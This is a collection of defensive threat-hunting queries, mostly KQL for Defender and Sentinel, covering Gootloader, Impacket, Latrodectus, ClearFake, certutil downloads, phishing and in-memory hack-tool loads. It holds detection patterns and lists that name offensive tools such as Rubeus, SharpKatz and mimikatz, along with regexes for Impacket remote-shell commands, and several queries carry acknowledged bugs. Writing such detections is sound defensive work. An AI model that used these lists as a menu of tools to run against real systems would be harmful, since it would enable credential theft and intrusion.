TargetFileName contains 'versions.dll')` 12 | 13 | //sentinel query for pipe BRC4 14 | `SecurityEvent | where (PipeName endswith @'\wewe')` 15 | 16 | ## Grep 17 | 18 | `grep -P '^(?:.*.*fotos\.iso.*|.*.*version\.dll.*|.*.*brute-dll-agent\.bin.*|.*.*versions\.dll.*)'` 19 | 20 | `grep -P '^(?:.*.*\wewe)'` 21 | -------------------------------------------------------------------------------- /chrome_browser_unusual_child_process.md: -------------------------------------------------------------------------------- 1 | Chrome Unusual Child Process 2 | 3 | `//Spawning CMD exclude extension related activity 4 | let exclusions = datatable (filename:string)["software_reporter_tool.exe"]; 5 | DeviceProcessEvents 6 | | where InitiatingProcessFileName endswith "chrome.exe" 7 | | where FileName !in~ (exclusions) 8 | | where FileName =~ "cmd.exe" and not (ProcessCommandLine has_any ("Microsoft.SharePoint.NativeMessagingClient.exe","C:\\Program Files\\Windows Security\\BrowserCore\\BrowserCore.exe","C:\\Windows\\BrowserCore\\BrowserCore.exe","chrome-extension://mjhbkkaddmmnkghdnnmkjcgpphnopnfk/","chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/","chrome-extension://akfldeakecjegioiiajhpjpekomdjnmh/")) 9 | | summarize count() by ProcessCommandLine` 10 | 11 | `let exclusions = datatable (filename:string)["software_reporter_tool.exe"]; 12 | DeviceProcessEvents 13 | | where InitiatingProcessFileName endswith "chrome.exe" 14 | | where FileName !in~ (exclusions) 15 | | where not (ProcessCommandLine has_any ("chrome-extension://","Microsoft.SharePoint.NativeMessagingClient.exe","C:\\Program Files\\Windows Security\\BrowserCore\\BrowserCore.exe","C:\\Windows\\BrowserCore\\BrowserCore.exe")) 16 | | summarize count() by InitiatingProcessFileName, FileName, FolderPath 17 | | sort by count_ asc` 18 | -------------------------------------------------------------------------------- /command_and_control_NotionC2.md: 
-------------------------------------------------------------------------------- 1 | 2 | # Title: Notion C2 3 | 4 | # Source: 5 | 6 | - https://github.com/mttaggart/OffensiveNotion 7 | 8 | # Tactic: Command and Control 9 | 10 | # Technique: 11 | 12 | # MDE and Sentinel Kusto Query 13 | 14 | ``` 15 | let excludedProcesses = datatable(name:string)["browser1.exe","browser2.exe"]; //examples but check your environment first to remove false positives and use the filename and file path to reduce risk of false negative or evasion from the bad guys 16 | DeviceNetworkEvents 17 | | where RemoteUrl has "api.notion.com" and not (InitiatingProcessFileName has_any (excludedProcesses)) and InitiatingProcessVersionInfoCompanyName != "Notion Labs, Inc" 18 | ``` 19 | 20 | # Sentinel query to identify commandlines associated with suspicious processes communicating with googleapis.com endpoints 21 | ``` 22 | let excludedProcessFileNames = datatable (browser:string)["teams.exe","GoogleUpdate.exe","outlook.exe","msedge.exe","chrome.exe","iexplorer.exe","brave.exe","firefox.exe", "swi_fc.exe"]; //add more browsers or mail clients where needed for exclusion  23 |     DeviceNetworkEvents 24 |     | where RemoteUrl contains "notion.com" 25 |     | where not(InitiatingProcessFileName has_any (excludedProcessFileNames)) and InitiatingProcessVersionInfoCompanyName != "Notion Labs, Inc" 26 |     | extend joinkey = strcat(InitiatingProcessFileName, DeviceName, InitiatingProcessAccountName) 27 |     | join kind=leftouter (DeviceProcessEvents | extend  joinkey = strcat(InitiatingProcessParentFileName, DeviceName, InitiatingProcessAccountName) | summarize ProcessesRanByParent = make_set(InitiatingProcessCommandLine) by joinkey) on joinkey 28 |     | join kind=leftouter (DeviceFileEvents | where ActionType == "FileCreated" | extend  joinkey = strcat(InitiatingProcessParentFileName, DeviceName, InitiatingProcessAccountName) | summarize FilesCreated = make_set(FileName) by joinkey) on joinkey 29 |     
| project TimeGenerated,  DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, InitiatingProcessFolderPath, FilesCreated, ProcessesRanByParent, LocalIP, RemoteIP, RemoteUrl 30 | ``` 31 | -------------------------------------------------------------------------------- /commandandcontrol_stealer_redline_pastebin.md: -------------------------------------------------------------------------------- 1 | # Redline stealer using pastebin 2 | 3 | Redline Stealer reported to be using pastebin to grab C2 configuration. 4 | 5 | # Source: 6 | 7 | https://twitter.com/NexusFuzzy/status/1654056343127425026?s=19 8 | 9 | # Hunt queries 10 | 11 | ``` 12 | let excludedPaths = datatable(path:string)["browserpath1","browserpath2","etc..."]; 13 | DeviceNetworkEvents 14 | | where RemoteUrl contains "pastebin.com" and InitiatingProcessFolderPath !has_any (excludedPaths) 15 | ``` 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /external_data_botnets_tracker_abuse_ch.kusto: -------------------------------------------------------------------------------- 1 | ## https://feodotracker.abuse.ch/ 2 | let abuse_ch_botnets = externaldata(first_seen:datetime,last_online:datetime,ip_address:string, port:int, status:string, hostname:string,as_number:int,as_name:string,country:string,malware:string) 3 | [ 4 | h@"https://feodotracker.abuse.ch/downloads/ipblocklist_recommended.json" 5 | ] 6 | with(format="multijson",ignoreFirstRecord=true); 7 | abuse_ch_botnets 8 | -------------------------------------------------------------------------------- /external_data_lookup_bazaar_abuse_ch.kusto: -------------------------------------------------------------------------------- 1 | ## https://bazaar.abuse.ch/ 2 | let abuse_ch_malware = externaldata(data:dynamic) 3 | [ 4 | h@"https://bazaar.abuse.ch/export/csv/recent/" 5 | ] 6 | with(format="txt",ignoreFirstRecord=true); 7 | abuse_ch_malware 8 | | extend firstSeen = todatetime(data[0]) 9 | | 
extend reporter = tostring(data[5]) 10 | | extend fileName = tostring(data[6]) 11 | | extend fileTypeGuess = tostring(data[7]) 12 | | extend mimeType = tostring(data[8]) 13 | | extend signature = tostring(data[9]) 14 | | extend clamAv = tostring(data[10]) 15 | | extend vtPercent = tostring(data[11]) 16 | | extend imphash = tostring(data[12]) 17 | | extend sha256 = tostring(data[2]) 18 | | extend sha1 = tostring(data[4]) 19 | | extend md5 = tostring(data[3]) 20 | | extend ssdeep = tostring(data[13]) 21 | | extend tlsh = tostring(data[14]) 22 | | where isnotempty(firstSeen) 23 | | project-away data 24 | -------------------------------------------------------------------------------- /gootloader.md: -------------------------------------------------------------------------------- 1 | # Gootloader Hunt Queries 2 | 3 | ## Source: The Goot cause: Detecting Gootloader and its follow-on activity ([redcanary.com](https://redcanary.com/blog/gootloader/)) 4 | 5 | **New detection opportunity: wscript.exe spawning cscript.exe and PowerShell** 6 | This detection opportunity identifies the chain of process executions—whereby wscript.exe spawns cscript.exe and cscript.exe spawns powershell.exe—described in the Execution section that we updated on November 18, 2022. 
7 | 8 | `// looking for gootloader process execution pattern 9 | DeviceProcessEvents 10 | | where InitiatingProcessFileName in~ ("wscript.exe","cscript.exe") and FileName in~ ("cscript.exe","powershell.exe","cmd.exe")` 11 | The first query is deliberately broad (any wscript/cscript spawning a shell or script host) and should be baselined before it is used for alerting; the second pins the full wscript → cscript → powershell chain and is the more specific of the two. 12 | `//looking for the typical gootloader process execution pattern 13 | DeviceProcessEvents 14 | | where InitiatingProcessParentFileName =~ "wscript.exe" and InitiatingProcessFileName =~ "cscript.exe" and FileName in~ ("powershell.exe")` 15 | 16 | `//can be used to look at process ancestry in defender 17 | DeviceProcessEvents 18 | | project InitiatingProcessParentFileName, InitiatingProcessFileName, FileName 19 | | summarize count() by InitiatingProcessParentFileName, InitiatingProcessFileName, FileName` 20 | 21 | **Detection opportunity: Windows Script Host (wscript.exe) executing content from a user’s AppData folder** 22 | This detection opportunity identifies the Windows Script Host, wscript.exe, executing a JScript file from the user’s AppData folder. This works well to detect instances where a user has double-clicked into a Gootloader ZIP file and then double-clicked on the JScript script to execute it. 23 | 24 | `DeviceProcessEvents 25 | | where FileName =~ "wscript.exe" and ProcessCommandLine has_all ("appdata\\",".js")` 26 | 27 | **Detection opportunity: PowerShell (powershell.exe) performing a reflective load of a .NET assembly** 28 | This detection opportunity identifies PowerShell loading a .NET assembly into memory for execution using the System.Reflection capabilities of the .NET Framework. This detects PowerShell loading the .NET component of Gootloader and multiple additional threats in the wild. 
29 | 30 | `DeviceProcessEvents 31 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_all ("Reflection.Assembly","Load","byte[]")` 32 | 33 | **Detection opportunity: Rundll32 (rundll32.exe) with no command-line arguments** 34 | This detection opportunity identifies rundll32.exe executing with no command-line arguments as an injection target like we usually see for Cobalt Strike beacon injection. The beacon distributed by Gootloader in this instance used rundll32.exe, as do many other beacons found in the wild. 35 | 36 | `DeviceProcessEvents 37 | | where InitiatingProcessFileName =~ "rundll32.exe" and isempty(InitiatingProcessCommandLine) 38 | | join DeviceNetworkEvents on InitiatingProcessFileName 39 | | where isnotempty(RemoteUrl)` 40 | Note: `join DeviceNetworkEvents on InitiatingProcessFileName` pairs rows on the file name alone, so every argument-less rundll32.exe process is matched with network events from every rundll32.exe on every device; join on `DeviceId` and `InitiatingProcessId` (and `InitiatingProcessCreationTime`) to keep the correlation per process instance. `InitiatingProcessCommandLine` normally carries at least the image name, so `isempty()` may rarely be true — confirm against your own data before relying on it. -------------------------------------------------------------------------------- /impacket_kusto_queries.md: -------------------------------------------------------------------------------- 1 | # Impacket 2 | 3 | # Source: https://redcanary.com/threat-detection-report/threats/impacket/ 4 | 5 | ## Impacket SMBexec execution 6 | 7 | `//SMBexec execution 8 | //This detection analytic uses a regular expression to identify commands from the Impacket smbexec script, which allows a semi-interactive shell used through SMB. The regular expression identifies the name of a file share used to store output from the commands for interaction. 
9 | // Regex needs testing with current impacket logs 10 | //Source: https://redcanary.com/threat-detection-report/threats/impacket/ 11 | DeviceProcessEvents 12 | | where InitiatingProcessFileName =~ "services.exe" and FileName =~ "cmd.exe" and ProcessCommandLine matches regex @"(?i)cmd.exe\s+\/Q\s+\/c\s+echo\s+cd\s+>\s+\\\\127.0.0.1\\[a-zA-Z]{1,}\$\\__output\s*2\s*>\s*&\s*1\s*>\s+.*\s+&"` 13 | 14 | ## Impacket WMIexec execution 15 | 16 | `//WMIexec execution 17 | //This detection analytic uses a regular expression to identify commands from the Impacket wmiexec script, which allows a semi-interactive shell used via WMI. This analytic shows output being redirected to the localhost ADMIN$ share. The regular expression identifies an output file named as a Unix timestamp (similar to 1642629756.323274) generated through the script. 18 | // Regex needs testing with current impacket logs 19 | //Source: https://redcanary.com/threat-detection-report/threats/impacket/ 20 | DeviceProcessEvents 21 | | where InitiatingProcessParentFileName =~ "wmiprvse" and InitiatingProcessFileName =~ "cmd.exe" and InitiatingProcessCommandLine has_all ("cmd.exe","/Q","/c",@"\\127.0.0.1\ADMIN\$\__","2>&1") and ProcessCommandLine matches regex @"[0-9]{1,10}\.[0-9]{1,10}"` 22 | Two things to check before using the WMIexec query: `=~` is a whole-string comparison, so `InitiatingProcessParentFileName =~ "wmiprvse"` will not match the image name `wmiprvse.exe`; and the verbatim token `@"\\127.0.0.1\ADMIN\$\__"` keeps the backslash before `$` literally, which looks like a regex escape carried over from the source report and does not occur in the real `\\127.0.0.1\ADMIN$\__` path. -------------------------------------------------------------------------------- /inmemory_load_of_hacktool-powersploit.md: -------------------------------------------------------------------------------- 1 | ## MDE and Sentinel 2 | 3 | ``` 4 | //PowerSploit in memory module loads 5 | let iocList = dynamic ([ 6 | "powersploit", 7 | "Win32", 8 | "DynamicAssembly", //can cause FPs 9 | "ReflectedDelegate", 10 | "SSPI", 11 | "SSPI2", 12 | "VaultUtil", 13 | "VSSUtil", 14 | "BlueScreen", 15 | "Win32" 16 | ]); 17 | DeviceEvents 18 | | extend module = parse_json(AdditionalFields).ModuleILPathOrName 19 | | where ActionType =~ "ClrUnbackedModuleLoaded" and module in~ (iocList) and InitiatingProcessFileName =~ "powershell.exe" 20 | 
``` 21 | -------------------------------------------------------------------------------- /inmemory_load_of_hacktool.md: -------------------------------------------------------------------------------- 1 | # Catch in memory loading of hack tools for example loading via a c2 framework such as CobaltStrike 2 | 3 | ## Source: Recent Purple Team 4 | 5 | ## MDE 6 | 7 | ``` 8 | let iocList = dynamic ([ 9 | "BOFNET", 10 | "SharpUp", 11 | "ReflectedDelegate", 12 | 'ADCollector', 13 | 'ADCSPwn', 14 | 'ADSearch', 15 | 'ADFSDump', 16 | 'AtYourService', 17 | 'BetterSafetyKatz', 18 | 'Certify', 19 | 'EDD', 20 | 'ForgeCert', 21 | 'DeployPrinterNightmare', 22 | 'Grouper2', 23 | 'Group3r', 24 | 'KrbRelay', 25 | 'KrbRelayUp', 26 | 'InveighZero', 27 | 'LockLess', 28 | 'PassTheCert', 29 | 'PurpleSharp', 30 | 'Rubeus', 31 | 'SafetyKatz', 32 | 'SauronEye', 33 | 'scout', 34 | 'SearchOutlook', 35 | 'Seatbelt', 36 | 'Sharp-SMBExec', 37 | 'SharpAllowedToAct', 38 | 'SharpAppLocker', 39 | 'SharpBlock', 40 | 'SharpBypassUAC', 41 | 'SharpChisel', 42 | 'SharpChrome', 43 | 'SharpChromium', 44 | 'SharpCloud', 45 | 'SharpCOM', 46 | 'SharpCrashEventLog', 47 | 'SharpDir', 48 | 'SharpDoor', 49 | 'SharpDPAPI', 50 | 'SharpDump', 51 | 'SharpEDRChecker', 52 | 'SharpExec', 53 | 'SharPersist', 54 | 'SharpFiles', 55 | 'SharpGPOAbuse', 56 | 'SharpHandler', 57 | 'SharpHose', 58 | 'SharpHound', 59 | 'SharpKatz', 60 | 'SharpLaps', 61 | 'SharpMapExec', 62 | 'SharpMiniDump', 63 | 'SharpMove', 64 | 'SharpPrinter', 65 | 'SharpNoPSExec', 66 | 'SharpRDP', 67 | 'SharpReg', 68 | 'SharpSCCM', 69 | 'SharpSecDump', 70 | 'SharpShares', 71 | 'SharpSphere', 72 | 'SharpSpray', 73 | 'SharpStay', 74 | 'SharpSvc', 75 | 'SharpSniper', 76 | 'SharpSQLPwn', 77 | 'SharpTask', 78 | 'SharpUp', 79 | 'SharpView', 80 | 'SharpWMI', 81 | 'SharpWebServer', 82 | 'SharpWifiGrabber', 83 | 'SharpZeroLogon', 84 | 'Shhmon', 85 | 'Snaffler', 86 | 'SqlClient', 87 | 'StandIn', 88 | 'StickyNotesExtract', 89 | 'SweetPotato', 90 | 'ThunderFox', 91 | 
'TruffleSnout', 92 | 'TokenStomp', 93 | 'Watson', 94 | 'winPEAS', 95 | 'WMIReg', 96 | 'Whisker' 97 | ]); 98 | DeviceEvents 99 | | extend module = parse_json(AdditionalFields).ModuleILPathOrName 100 | | where ActionType =~ "ClrUnbackedModuleLoaded" and module in~ (iocList) and InitiatingProcessFileName =~ "powershell.exe" 101 | ``` 102 | 103 | ## Sentinel 104 | 105 | ``` 106 | let iocList = dynamic ([ 107 | "BOFNET", 108 | "SharpUp", 109 | "ReflectedDelegate", 110 | 'ADCollector', 111 | 'ADCSPwn', 112 | 'ADSearch', 113 | 'ADFSDump', 114 | 'AtYourService', 115 | 'BetterSafetyKatz', 116 | 'Certify', 117 | 'EDD', 118 | 'ForgeCert', 119 | 'DeployPrinterNightmare', 120 | 'Grouper2', 121 | 'Group3r', 122 | 'KrbRelay', 123 | 'KrbRelayUp', 124 | 'InveighZero', 125 | 'LockLess', 126 | 'PassTheCert', 127 | 'PurpleSharp', 128 | 'Rubeus', 129 | 'SafetyKatz', 130 | 'SauronEye', 131 | 'scout', 132 | 'SearchOutlook', 133 | 'Seatbelt', 134 | 'Sharp-SMBExec', 135 | 'SharpAllowedToAct', 136 | 'SharpAppLocker', 137 | 'SharpBlock', 138 | 'SharpBypassUAC', 139 | 'SharpChisel', 140 | 'SharpChrome', 141 | 'SharpChromium', 142 | 'SharpCloud', 143 | 'SharpCOM', 144 | 'SharpCrashEventLog', 145 | 'SharpDir', 146 | 'SharpDoor', 147 | 'SharpDPAPI', 148 | 'SharpDump', 149 | 'SharpEDRChecker', 150 | 'SharpExec', 151 | 'SharPersist', 152 | 'SharpFiles', 153 | 'SharpGPOAbuse', 154 | 'SharpHandler', 155 | 'SharpHose', 156 | 'SharpHound', 157 | 'SharpKatz', 158 | 'SharpLaps', 159 | 'SharpMapExec', 160 | 'SharpMiniDump', 161 | 'SharpMove', 162 | 'SharpPrinter', 163 | 'SharpNoPSExec', 164 | 'SharpRDP', 165 | 'SharpReg', 166 | 'SharpSCCM', 167 | 'SharpSecDump', 168 | 'SharpShares', 169 | 'SharpSphere', 170 | 'SharpSpray', 171 | 'SharpStay', 172 | 'SharpSvc', 173 | 'SharpSniper', 174 | 'SharpSQLPwn', 175 | 'SharpTask', 176 | 'SharpUp', 177 | 'SharpView', 178 | 'SharpWMI', 179 | 'SharpWebServer', 180 | 'SharpWifiGrabber', 181 | 'SharpZeroLogon', 182 | 'Shhmon', 183 | 'Snaffler', 184 | 'SqlClient', 185 | 
'StandIn', 186 | 'StickyNotesExtract', 187 | 'SweetPotato', 188 | 'ThunderFox', 189 | 'TruffleSnout', 190 | 'TokenStomp', 191 | 'Watson', 192 | 'winPEAS', 193 | 'WMIReg', 194 | 'Whisker' 195 | ]); 196 | DeviceEvents 197 | | extend module = parse_json(AdditionalFields).ModuleILPathOrName 198 | | where ActionType =~ "ClrUnbackedModuleLoaded" and module in~ (iocList) and InitiatingProcessFileName =~ "powershell.exe" 199 | ``` 200 | -------------------------------------------------------------------------------- /internal_phishing.md: -------------------------------------------------------------------------------- 1 | # Internal Phishing Kusto Queries 2 | 3 | `EmailEvents 4 | | where EmailDirection =~ "Intra-org" and isnotempty(ThreatTypes) 5 | | summarize count() by ThreatTypes` 6 | 7 | `EmailEvents 8 | | where EmailDirection =~ "Intra-org" and ThreatTypes =~ "malware"` 9 | 10 | `EmailEvents 11 | | where EmailDirection =~ "Intra-org" and ThreatTypes =~ "phish"` 12 | 13 | `EmailEvents 14 | | where EmailDirection =~ "Intra-org" and isnotempty(ThreatTypes) 15 | | summarize count() by ThreatTypes` 16 | -------------------------------------------------------------------------------- /ipfs_phishing_kusto_query.md: -------------------------------------------------------------------------------- 1 | # IPFS Web3 Phish 2 | 3 | # All emails 4 | 5 | `//check for phishing emails being delivered that potentially use interplanetary file system (ipfs) to host malicious content used in phishing campaigns. 
6 | //check for subsequent connections to the site: DeviceNetworkEvents | where RemoteUrl contains "ipfs.io" 7 | //https://blog.talosintelligence.com/ipfs-abuse/ 8 | //https://github.com/Cisco-Talos/IOCs/tree/main/2022/11 9 | EmailEvents 10 | | where TimeGenerated > ago(14d) 11 | | join EmailUrlInfo on NetworkMessageId 12 | | where EmailDirection =~ "Inbound" and Url contains "ipfs.io"` 13 | 14 | # Delivered emails 15 | 16 | `//check for phishing emails being delivered that potentially use interplanetary file system (ipfs) to host malicious content used in phishing campaigns. 17 | //check for subsequent connections to the site: DeviceNetworkEvents | where RemoteUrl contains "ipfs.io" 18 | //https://blog.talosintelligence.com/ipfs-abuse/ 19 | //https://github.com/Cisco-Talos/IOCs/tree/main/2022/11 20 | EmailEvents 21 | | where TimeGenerated > ago(14d) 22 | | join EmailUrlInfo on NetworkMessageId 23 | | where EmailDirection =~ "Inbound" and Url contains "ipfs.io" and DeliveryAction != 'Blocked'` 24 | 25 | # Looking for post phish clickers 26 | `// you may need to adjust your tables and fields accordingly but the intent is to check your URI or request fields using the regex below 27 | CommonSecurityLog | where (cs_uri matches regex @'(?i)ipfs.io/ipfs.+\..+@.+\..+')` 28 | -------------------------------------------------------------------------------- /lactrodectus.md: -------------------------------------------------------------------------------- 1 | //Loading Latrodectus DLLs 2 | The following query looks for evidence of rundll32 loading the Latrodectus DLL. Run query 3 | 4 | //DeviceProcessEvents 5 | | where InitiatingProcessCommandLine has_any("capisp.dll", "aclui.dll") and InitiatingProcessFileName in ("rundll32.exe", "msiexec.exe") 6 | Latrodectus MSI and DLL files 7 | 8 | //This query identifies newly created (dropped) Latrodectus MSI and DLL files. 
Run query 9 | DeviceFileEvents 10 | | where FolderPath has_any ("Roaming\\aclui", "Roaming\\capisp", "temp\vpn.msi", "neuro.msi", "bst.msi") and InitiatingProcessCommandLine has_any("msiexec", "rundll32") 11 | Note: `"temp\vpn.msi"` is a regular (non-verbatim) string, so `\v` is read as an escape sequence rather than a backslash followed by `v`, and the token will not match the intended path; write it as `@"temp\vpn.msi"` in the same way as the registry paths below. Latrodectus DLL persistence 12 | 13 | //The following query looks for evidence of Latrodectus DLL persistence using the startup registry key. Run query 14 | DeviceRegistryEvents 15 | | where ActionType == "RegistryValueSet" 16 | | where RegistryKey has @"CurrentVersion\Run" 17 | | where RegistryValueData has_any(@"AppData\Roaming\capisp.dll", @"AppData\Roaming\aclui.dll") 18 | | where InitiatingProcessFileName == "rundll32.exe" 19 | The last line uses the case-sensitive `==`; `=~` is the safer comparison for image names. -------------------------------------------------------------------------------- /lolbin_certutil_download_direct_ip.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Certutil downloading a file with suspicious command line arguments 3 | 4 | # Description 5 | Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. 
6 | 7 | # Source 8 | Nasreddine Bencherchali (Nextron Systems) 9 | - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil 10 | - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ 11 | - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/ 12 | - https://twitter.com/egre55/status/1087685529016193025 13 | - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ 14 | - https://twitter.com/_JohnHammond/status/1708910264261980634 15 | 16 | # MITRE ATT&CK Techniques 17 | - T1027 18 | 19 | # Query 20 | 21 | ``` 22 | //proc_creation_win_certutil_download_direct_ip 23 | DeviceProcessEvents 24 | | where (FolderPath endswith @'\certutil.exe' or ProcessVersionInfoOriginalFileName =~ @'CertUtil.exe' or InitiatingProcessVersionInfoOriginalFileName =~ @'CertUtil.exe') and ProcessCommandLine has_any (@'urlcache ',@'verifyctl ') and ProcessCommandLine has_any (@'://1',@'://2',@'://3',@'://4',@'://5',@'://6',@'://7',@'://8',@'://9') and not ( ProcessCommandLine contains @'://7-') 25 | 26 | //proc_creation_win_certutil_download_direct_ip 27 | DeviceNetworkEvents 28 | | where ( InitiatingProcessFileName =~ "certutil.exe" or InitiatingProcessVersionInfoOriginalFileName 29 | =~ "certutil.exe") and RemoteIPType =~ "Public" and InitiatingProcessCommandLine has_any (@'urlcache ',@'verifyctl ') 30 | ``` 31 | -------------------------------------------------------------------------------- /lolbins_kusto_query.md: -------------------------------------------------------------------------------- 1 | # Hunt for possible LOLBINS activity 2 | 3 | `//let excludedProcesses = datatable (name:string)["mssense.exe","senseir.exe"]; //add exclusions 4 | DeviceProcessEvents 5 | | where FileName has_any ( "arp.exe", "at.exe", "attrib.exe", "cscript.exe", "dsquery.exe", "hostname.exe", "ipconfig.exe", "mimikatz.exe", "nbtstat.exe", "net.exe", "netsh.exe", "nslookup.exe", "ping.exe", 
"quser.exe", "qwinsta.exe", "reg.exe", "runas.exe", "sc.exe", "schtasks.exe", "ssh.exe", "systeminfo.exe", "taskkill.exe", "telnet.exe", "tracert.exe", "wscript.exe", "xcopy.exe", "pscp.exe", "copy.exe", "robocopy.exe", "certutil.exe", "vssadmin.exe", "powershell.exe", "wevtutil.exe", "psexec.exe", "bcedit.exe", "wbadmin.exe", "icacls.exe", "diskpart.exe", "ver.exe", "netstat.exe", "tasklist.exe", "route.exe", "driverquery.exe" ) 6 | //| where InitiatingProcessParentFileName !in~ (excludedProcesses) and InitiatingProcessParentFileName !in~ (excludedProcesses) and FileName !in~ (excludedProcesses) // exclude processes that produce false positives 7 | | summarize firstEvent=min(Timestamp), lastEvent=max(Timestamp), uniqueProcessNames=dcount(FileName), eventTypes=make_set(ActionType), userNames=make_set(AccountName), userDomains=make_set(AccountDomain), processIds=make_set(ProcessId), processCommandLines=make_set(ProcessCommandLine), parentProcessNames=make_set(InitiatingProcessFileName), parentProcessCommandLines=make_set(InitiatingProcessCommandLine), parentProcessPaths=make_set(InitiatingProcessFolderPath), parentProcessIds=make_set(InitiatingProcessId), grandParentProcessNames=make_set(InitiatingProcessParentFileName), grandParentProcessIds=make_set(InitiatingProcessParentId), parentUserDomain=make_set(InitiatingProcessAccountDomain), parentUserName=make_set(InitiatingProcessAccountName), processCompanyName=make_set(ProcessVersionInfoCompanyName), processProductName=make_set(ProcessVersionInfoProductName), processVersion=make_set(ProcessVersionInfoProductVersion), processInternalFileName=make_set(ProcessVersionInfoInternalFileName), processOriginalFileName=make_set(ProcessVersionInfoOriginalFileName), processFileDescription=make_set(ProcessVersionInfoFileDescription), processSize=make_set(FileSize), processSHA256=make_set(SHA256), reportIds=make_set(ReportId), Timestamp=make_list(Timestamp), count() by DeviceName, DeviceId 8 | | where uniqueProcessNames > 4 9 | | 
order by firstEvent` 10 | -------------------------------------------------------------------------------- /m365_email_hunt_rules.md: -------------------------------------------------------------------------------- 1 | 2 | ``` 3 | //visualise emails tagged as malware inbound 4 | EmailEvents 5 | | where TimeGenerated > ago(30d) and ThreatTypes has_any ("Malware") and EmailDirection =~ "Inbound" 6 | | summarize emails=count() by bin(TimeGenerated, 1d), SenderFromAddress 7 | | render columnchart kind=stacked 8 | ``` 9 | 10 | 11 | ``` 12 | //internal to internal, or outbound email with a malware detection 13 | EmailEvents 14 | | where TimeGenerated > ago(30d) and ThreatTypes has_any ("Malware") and EmailDirection !~ "Inbound" and SenderFromAddress !~ "postmaster@heathrow.com" and AttachmentCount > 0 15 | | summarize emails=count() by bin(TimeGenerated, 1d), SenderFromAddress 16 | | render columnchart kind=stacked 17 | ``` 18 | -------------------------------------------------------------------------------- /m365_phishing_coronation_lures.md: -------------------------------------------------------------------------------- 1 | # Tactic: Initial Access 2 | 3 | # Techniques 4 | 5 | |ID|Technique|Detail| 6 | |--|--|--| 7 | | T1566 | Phishing | https://attack.mitre.org/techniques/T1566/ | 8 | | T1566.001 | Spearphishing Attachment | https://attack.mitre.org/techniques/T1566/001/ | 9 | | T1566.002 | Spearphishing Link | https://attack.mitre.org/techniques/T1566/002/ | 10 | | T1566.003 | Spearphishing via Service | https://attack.mitre.org/techniques/T1566/003/ | 11 | 12 | # KQL hunt queries: 13 | Find all intrusion attempts for analysis: 14 | 15 | ``` 16 | EmailEvents 17 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" 18 | ``` 19 | 20 | Find successful attempts: 21 | 22 | ``` 23 | EmailEvents 24 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" 
and DeliveryAction !~ "Blocked" 25 | ``` 26 | 27 | The EmailEvents table has more nuance when post-delivery actions (e.g. ZAP) may have quarantined or blocked the message: 28 | 29 | ``` 30 | EmailEvents 31 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" and ((DeliveryAction !~ "Blocked" or LatestDeliveryAction !~ "Blocked") or ( DeliveryLocation !~ "Quarantine" or LatestDeliveryLocation !~ "Quarantine" )) 32 | ``` 33 | Because every clause in the combined condition is joined with `or`, a message passes as soon as any one of the four fields is not `Blocked`/`Quarantine` — including one that was blocked at delivery but has an empty `LatestDeliveryAction`. If the intent is to keep only messages that were neither blocked nor quarantined at any stage, join the clauses with `and` instead. 34 | Visualising the data for the above (note that `ago7d)` in the first `where` line is missing a parenthesis and should read `ago(7d)`): 35 | 36 | ``` 37 | //visualise emails tagged as malware inbound 38 | EmailEvents 39 | | where TimeGenerated > ago7d) 40 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" 41 | | summarize emails=count() by bin(TimeGenerated, 1d), SenderFromAddress 42 | | render columnchart kind=stacked 43 | ``` 44 | 45 | ``` 46 | EmailEvents 47 | | where EmailDirection =~ "Inbound" and ThreatTypes has_any ("Phish","Malware") and Subject contains "coronation" and ((DeliveryAction !~ "Blocked" or LatestDeliveryAction !~ "Blocked") or ( DeliveryLocation !~ "Quarantine" or LatestDeliveryLocation !~ "Quarantine" )) 48 | | summarize emails=count() by bin(TimeGenerated, 1d), SenderFromAddress 49 | | render columnchart kind=stacked 50 | ``` 51 | -------------------------------------------------------------------------------- /mal_clearfake_appx_download.md: -------------------------------------------------------------------------------- 1 | # Title 2 | ClearFake Detection Analytics 3 | 4 | # Description 5 | Queries to detect initial creation of .appx file 6 | 7 | # Source 8 | - https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/ 9 | 10 | # MITRE ATT&CK 11 | - 12 | 13 | # Queries for sentinel and MDE 14 | 15 | ``` 16 | //TTP: ClearFake - Possible creation of malicious .appx file 17 | DeviceFileEvents 18 | | where InitiatingProcessFileName =~ "Explorer.exe" 
and FileName in~ ("AppxProvider.dll","AppxManifest.xml") 19 | ``` 20 | -------------------------------------------------------------------------------- /mal_clearfake_c2.md: -------------------------------------------------------------------------------- 1 | # Title 2 | ClearFake Detection Analytics 3 | 4 | # Description 5 | Queries to detect C2 communications. 6 | 7 | # Source 8 | - https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/ 9 | 10 | # MITRE ATT&CK 11 | - 12 | 13 | # Queries for sentinel and MDE 14 | 15 | ``` 16 | //IOC: ClearFake - Possible connection to ClearFake C2 infrastructure certificate subject CN 17 | let clearFakeDomains = externaldata(domain:string)[h@"https://raw.githubusercontent.com/m4nbat/ioc_lists/main/clearFakeIocs.txt"] 18 | with(format="txt") | distinct domain; 19 | DeviceNetworkEvents 20 | | where ActionType =~ "SslConnectionInspected" 21 | | extend issuer = tostring(parse_json(AdditionalFields.issuer)) 22 | | extend server_name = tostring(parse_json(AdditionalFields.server_name)) 23 | | extend subject = tostring(parse_json(AdditionalFields.subject)) 24 | | extend established = tostring(parse_json(AdditionalFields.established)) 25 | | extend direction = tostring(parse_json(AdditionalFields.direction)) 26 | | where server_name has_any (clearFakeDomains) 27 | ``` 28 | 29 | ``` 30 | //IOC: ClearFake - Possible connection to ClearFake C2 Infrastructure network connection to domain 31 | let clearFakeDomains = 